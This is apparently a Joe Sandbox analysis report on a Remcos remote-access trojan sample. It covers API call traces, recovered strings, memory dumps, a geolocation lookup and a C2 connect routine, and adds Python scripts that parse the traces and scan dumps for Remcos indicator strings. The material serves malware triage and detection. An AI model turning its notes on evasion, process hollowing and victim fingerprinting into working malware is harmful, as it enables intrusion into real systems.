                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\xenor\yavascript.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-I7G983$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                  • API String ID: 2830904901-371293103
                                                  • Opcode ID: 00bd366c6a8d810e33445c196a5e90e33b50c9216c6e7ec08a6f25936d1f72b0
                                                  • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                  • Opcode Fuzzy Hash: 00bd366c6a8d810e33445c196a5e90e33b50c9216c6e7ec08a6f25936d1f72b0
                                                  • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
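                                                  The API list for this function records the sample resolving its imports at run time: LoadLibraryA or GetModuleHandleA followed immediately by GetProcAddress, once per export. Joe Sandbox prints several stack slots for each call, so the second slot on each loader line (GetProcessImageFileNameW, NtUnmapViewOfSection, IsUserAnAdmin, ...) is the name the following GetProcAddress resolves, consistent with the compiler having already pushed GetProcAddress's name argument; for Shlwapi the slot is 0000000C, i.e. an import by ordinal. The Python below is an added example for this report, not Joe Sandbox code: it parses lines in exactly this format into loader/GetProcAddress pairs and annotates the ones a triage analyst cares about. The sample input is copied from the lines above; the regex, data classes and capability notes are the example's own.

```python
"""Parse Joe Sandbox 'APIs' lines into run-time-resolved imports.

Added example for this report; not Joe Sandbox code. The sample text below is
copied from the report, every other name in this file is the example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Copied from the report's API list (a subset of the 0041BCE3 resolver lines
# plus the GetModuleFileNameW line that follows them).
SAMPLE_LINES = r"""
• Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\xenor\yavascript.exe,00000104), ref: 0040D790
"""

# One trace line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# then Api.MODULE(arg,arg,...), ref: XXXXXXXX. The argument list is optional
# because lines such as "ExitProcess.KERNEL32 ref: 0040E672" have none.
LINE_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# General facts about each API, i.e. why it is worth a line in a triage note.
CAPABILITY_NOTES = {
    "NtUnmapViewOfSection": "unmaps a section in a (possibly remote) process; the primitive used by process hollowing",
    "IsUserAnAdmin": "tells the caller whether it already runs as administrator",
    "SetProcessDEPPolicy": "changes the DEP policy of the current process",
    "IsWow64Process": "32-bit-on-64-bit check, often gates which code path is taken",
    "GetProcessImageFileNameW": "image path of an arbitrary process handle, used when walking processes",
    "GlobalMemoryStatusEx": "physical RAM size, a common sandbox/VM heuristic",
    "GetComputerNameExW": "host name for victim fingerprinting",
    "EnumDisplayDevicesW": "monitor enumeration (screen-capture geometry)",
    "EnumDisplayMonitors": "monitor enumeration (screen-capture geometry)",
    "GetMonitorInfoW": "monitor enumeration (screen-capture geometry)",
    "SetProcessDpiAwareness": "DPI awareness so captured screen coordinates are not scaled",
    "GetSystemTimes": "CPU time counters, used for load reporting",
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str
    caller: Optional[str]


@dataclass(frozen=True)
class ResolvedImport:
    library: str    # argument 1 of the loader call, lower-cased
    name: str       # argument 2: export name, or "ordinal N" for a hex slot
    loader: str     # LoadLibraryA / GetModuleHandleA / ...
    ref: str        # address of the loader call
    resolved: bool  # True when a GetProcAddress call follows immediately
    note: str       # CAPABILITY_NOTES entry, "" when unremarkable


def parse_api_trace(text: str) -> List[ApiCall]:
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # headings, legend lines, anything that is not a call
        args = tuple(m["args"].split(",")) if m["args"] is not None else ()
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"].upper(), m["caller"]))
    return calls


def resolved_imports(calls: List[ApiCall]) -> List[ResolvedImport]:
    out = []
    for i, c in enumerate(calls):
        if c.api not in LOADERS or len(c.args) < 2 or c.args[1] == "?":
            continue
        name = c.args[1]
        if HEX8.match(name):  # e.g. Shlwapi,0000000C: export imported by ordinal
            name = f"ordinal {int(name, 16)}"
        nxt = calls[i + 1] if i + 1 < len(calls) else None
        out.append(ResolvedImport(
            library=c.args[0].lower(), name=name, loader=c.api, ref=c.ref,
            resolved=nxt is not None and nxt.api == "GetProcAddress",
            note=CAPABILITY_NOTES.get(name, ""),
        ))
    return out


def notable(imports: List[ResolvedImport]) -> List[str]:
    """Names worth mentioning in a triage note, deduplicated, in first-seen order."""
    seen: List[str] = []
    for imp in imports:
        if imp.note and imp.name not in seen:
            seen.append(imp.name)
    return seen


if __name__ == "__main__":
    for imp in resolved_imports(parse_api_trace(SAMPLE_LINES)):
        flag = "" if imp.resolved else "  (no GetProcAddress follows)"
        print(f"{imp.ref} {imp.loader:<16} {imp.library:<9} {imp.name:<26} {imp.note}{flag}")
```

Feed the whole APIs section of the report to parse_api_trace to get the complete table; the `resolved` flag catches loader lines whose GetProcAddress the report cut off (as with the Shlwapi line here), and any import-by-ordinal shows up as "ordinal N" so it is not mistaken for a missing name.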


                                                  APIs
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                  • API String ID: 2281282204-3981147832
                                                  • Opcode ID: 474c973623e238146e64abcd8053ae9bbd48680b8468997d14eb8def91a4fdd4
                                                  • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                  • Opcode Fuzzy Hash: 474c973623e238146e64abcd8053ae9bbd48680b8468997d14eb8def91a4fdd4
                                                  • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
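                                                  The String ID fields of the two functions above (0040D767 with "Remcos Agent initialized", "Rmc-I7G983", "license_code.txt", "exepath"; 0040E56A with "5.3.0 Pro", "override", "pth_unenc") come from the unpacked image in memory, so they are the indicators to look for in a dump of a suspect process rather than on disk. The Python below is an added example for this report, not Joe Sandbox output and not a vendor signature: it searches a dump for those strings in both encodings a Win32 binary uses and gates the verdict so that a single generic word is not enough. The needle list is taken from the report; the sample buffer is constructed for the example and is not the sample's memory.

```python
"""Triage scan of a memory dump for the strings this report recovered.

Added example for this report, not part of Joe Sandbox or of any detection
product. INDICATORS are the report's String ID entries; SAMPLE_DUMP is a
constructed buffer, not the sample's memory.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Strings recovered by the report. Pointer-like leftovers such as "XCG" and
# "BG" are deliberately left out: three-byte patterns match almost any dump.
INDICATORS = (
    "Remcos Agent initialized",
    "Rmc-I7G983",
    "Access Level: ",
    "license_code.txt",
    "exepath",
    "licence",
    "5.3.0 Pro",
    "pth_unenc",
    "override",
)
# Specific enough that one hit is already meaningful; the rest are common words
# ("override", "licence") that appear in plenty of legitimate software.
STRONG = {"Remcos Agent initialized", "Rmc-I7G983", "pth_unenc"}


@dataclass(frozen=True)
class Hit:
    needle: str
    encoding: str  # "ascii" or "utf16le"
    offset: int


def scan(buf: bytes, needles: Iterable[str] = INDICATORS) -> List[Hit]:
    """Every occurrence of every needle, as narrow (ASCII) and wide (UTF-16LE)."""
    hits: List[Hit] = []
    for s in needles:
        for encoding, pattern in (("ascii", s.encode("ascii")),
                                  ("utf16le", s.encode("utf-16-le"))):
            pos = buf.find(pattern)
            while pos != -1:
                hits.append(Hit(s, encoding, pos))
                pos = buf.find(pattern, pos + 1)
    return sorted(hits, key=lambda h: h.offset)


def verdict(hits: List[Hit], min_distinct: int = 3) -> bool:
    """One strong string, or several distinct weak ones, is needed to flag a dump."""
    found = {h.needle for h in hits}
    return bool(found & STRONG) or len(found) >= min_distinct


# Constructed test buffer (not real sample memory): one narrow banner, one wide
# identifier, some pointer-like noise between them, and a version string.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Remcos Agent initialized\x00"           # ASCII at offset 16
    + b"XCG\x00" * 4                            # noise of the kind the report lists
    + "Rmc-I7G983".encode("utf-16-le") + b"\x00\x00"  # UTF-16LE at offset 57
    + b"\x90" * 8
    + b"5.3.0 Pro\x00"                          # ASCII at offset 87
)

if __name__ == "__main__":
    found = scan(SAMPLE_DUMP)
    for h in found:
        print(f"0x{h.offset:08x} {h.encoding:<7} {h.needle}")
    print("remcos-like:", verdict(found))
```

Run scan over a process memory dump (for example the .sdmp files referenced under Memory Dump Source) rather than over the file on disk: the packer layer present on disk will not contain these strings, the unpacked image at 00400000 does.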
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: b50e3ea1a872d37ae34c654cd7c515b10d61925b85636433c3a2d99c17233aa8
                                                  • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                  • Opcode Fuzzy Hash: b50e3ea1a872d37ae34c654cd7c515b10d61925b85636433c3a2d99c17233aa8
                                                  • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                  Control-flow Graph

                                                  Function 0040428C-00404465 (the rendered graph is not reproduced, so the executed / not-executed block colouring is lost). Windows API calls by basic block: connect (0040428C); WSAGetLastError (004043E7), reached through block 004043E1 directly after connect; CreateEventW twice (004043BE). The other blocks call internal routines (00420151, 00420373, 00420F34, 004202EA, 00420592, 0041BC76, 0041A686 and the 00401Fxx string helpers); the String ID field below lists the connection and TLS messages this function carries.
                                                  APIs
                                                  • connect.WS2_32(?,0085D798,00000010), ref: 004042A5
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 2304213d53edfb56a495e9ef63ce110ebf6cc12a4635f112e08a4b6c9f2a5715
                                                  • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                  • Opcode Fuzzy Hash: 2304213d53edfb56a495e9ef63ce110ebf6cc12a4635f112e08a4b6c9f2a5715
                                                  • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                  Control-flow Graph

                                                  Function 0041A51B-0041A5C8 (the rendered graph is not reproduced, so the executed / not-executed block colouring is lost). Windows API calls by basic block: InternetOpenW and InternetOpenUrlW (0041A51B); InternetReadFile (0041A55C) inside a loop, since block 0041A5A8 branches back to 0041A55C until the read ends; InternetCloseHandle twice (0041A5AC). Block 0041A57F, taken after a successful read, calls the internal routines 00401F86, 00402F08 and 00401EEA.
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 93c68c68fd3eadee9dae1c4fcccce0b07dd9aa7f001bde451803d805c4740930
                                                  • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                  • Opcode Fuzzy Hash: 93c68c68fd3eadee9dae1c4fcccce0b07dd9aa7f001bde451803d805c4740930
                                                  • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-2070987746
                                                  • Opcode ID: 2ecf56d5918bcf6aac5f64e6b65e876b3c5a7effbb40a179cf39785145a79331
                                                  • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                  • Opcode Fuzzy Hash: 2ecf56d5918bcf6aac5f64e6b65e876b3c5a7effbb40a179cf39785145a79331
                                                  • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                  Control-flow Graph

                                                  Control-flow graph (basic blocks and edges recovered from the graph data):
                                                  • Block 1363: 4126d2-4126e9 (RegCreateKeyA) -> 1364, 1365
                                                  • Block 1364: 412722 -> 1367
                                                  • Block 1365: 4126eb-412720 (call 4022f8, call 401e8f, RegSetValueExA, RegCloseKey) -> 1367
                                                  • Block 1367: 412724-412730 (call 401eea)
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                  • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: HgF$pth_unenc
                                                  • API String ID: 1818849710-3662775637
                                                  • Opcode ID: 71eb531204d8fd0b136a499f7559ae8f43f87fb45ec2430c7633c83b17c543f2
                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                  • Opcode Fuzzy Hash: 71eb531204d8fd0b136a499f7559ae8f43f87fb45ec2430c7633c83b17c543f2
                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 31a8c67cc79ba41f7da5571d95af1125fce36a06f75261ce7f77750381094343
                                                  • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                  • Opcode Fuzzy Hash: 31a8c67cc79ba41f7da5571d95af1125fce36a06f75261ce7f77750381094343
                                                  • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                  • Opcode Fuzzy Hash: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                  • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                  • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                  • Opcode Fuzzy Hash: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                  • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                  • RegCloseKey.KERNEL32(?), ref: 00412500
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                  • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                  • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                  • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                  • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: xAG
                                                  • API String ID: 176396367-2759412365
                                                  • Opcode ID: ff637472b7ef91eb79cf1c791d23dde74da6086b31a6c5428193f8d367aac764
                                                  • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                  • Opcode Fuzzy Hash: ff637472b7ef91eb79cf1c791d23dde74da6086b31a6c5428193f8d367aac764
                                                  • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                  APIs
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                  Memory Dump Source
